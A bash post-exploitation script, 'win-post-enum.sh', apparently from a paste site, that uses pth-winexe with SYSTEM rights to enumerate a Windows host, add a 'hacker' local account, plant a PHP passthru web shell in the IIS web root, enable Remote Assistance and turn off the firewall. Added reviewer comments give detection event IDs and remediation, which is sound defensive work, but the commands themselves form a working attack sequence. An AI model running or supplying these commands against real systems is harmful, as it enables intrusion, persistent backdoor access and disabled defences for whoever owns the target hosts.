opexxx

win-post-enum.sh

Jun 12th, 2017
  1. #!/bin/bash
     # Post-compromise command sequence against one Windows host, named by the
     # first script argument. Each step is a separate pth-winexe invocation that
     # runs a single command with --system, i.e. as the SYSTEM account on the
     # target. DOMAIN/USERNAME%PASSWORD is a redacted credential placeholder.
     #
     # Reviewer notes (defender view):
     #  - Steps 3-11 and 14 only read state (discovery). Steps 12, 13 and 15-17
     #    change the target; those are the artefacts to hunt for and revert.
     #  - winexe-style execution works through a service installed on the target
     #    over SMB (default service name is typically "winexesvc" - confirm for
     #    the build in use). Expect a network logon (Security 4624, type 3) and a
     #    service-install record (System 7045 / Security 4697) per run.
     #  - The credential is passed on argv, so it is visible in the operator
     #    host's process list and shell history.
     #  - No argument check and $TARGET is unquoted: with no argument every
     #    command is addressed to "//".
  2. TARGET=$1
     # --- Discovery: host, identity, network, policy, shares, patch level ---
     # On the target these appear as child processes of the remote-exec service
     # (process creation: Security 4688 / Sysmon 1). A burst of systeminfo,
     # whoami /all, ipconfig, netstat and net.exe within seconds from one
     # SYSTEM-owned parent is a useful correlation rule.
  3. pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "systeminfo"
  4. pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "whoami /all"
  5. pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "ipconfig /all"
  6. pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "netstat -ano"
  7. pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net accounts"
     # NOTE(review): "USERNAMEs" looks like a search-and-replace artefact of the
     # credential redaction; presumably a local group name stood here - confirm.
  8. pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net localgroup USERNAMEs"
  9. pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net share"
  10. pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net view"
  11. pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "powershell.exe -command Get-Hotfix"
     # --- Persistence: new local account, then local group membership ---
     # Detection: Security 4720 (user account created) followed by 4732 (member
     # added to a security-enabled local group). Remediation: remove the account
     # and audit local group membership on every host the credential reached.
  12. pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net user hacker PASSWORD /add"
  13. pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net localgroup USERNAMEs /add hacker"
     # Discovery again: lists members of the domain group 'Domain Admins'.
  14. pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net group 'Domain Admins' /domain"
     # --- Persistence: writes backdoor.php into the IIS web root ---
     # The intended content hands a request parameter to PHP passthru(), i.e. a
     # command-execution web shell. The exact bytes written depend on several
     # quoting/escaping layers, so detect on file creation under
     # C:\inetpub\wwwroot by a non-deployment process (Sysmon 11, file integrity
     # monitoring) rather than on a content signature alone.
  15. pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "echo ^< ?php echo passthru($_GET['cmd']); ?^> > C:\inetpub\wwwroot\backdoor.php"
     # --- Defence weakening: sets fAllowToGetHelp=1 under the Terminal Server
     # key (the Remote Assistance setting). Detection: registry value-set
     # telemetry (Sysmon 13, or Security 4657 where registry auditing is on).
  16. pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "reg add 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server' /v fAllowToGetHelp /t REG_DWORD /d 1 /f"
     # --- Defence weakening: turns the Windows Firewall off through the legacy
     # "netsh firewall" context. Detection: netsh.exe launched with an opmode
     # argument, and firewall setting-change events (Security 4950; event 2003
     # in the Windows Firewall With Advanced Security log).
  17. pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "netsh firewall set opmode disable"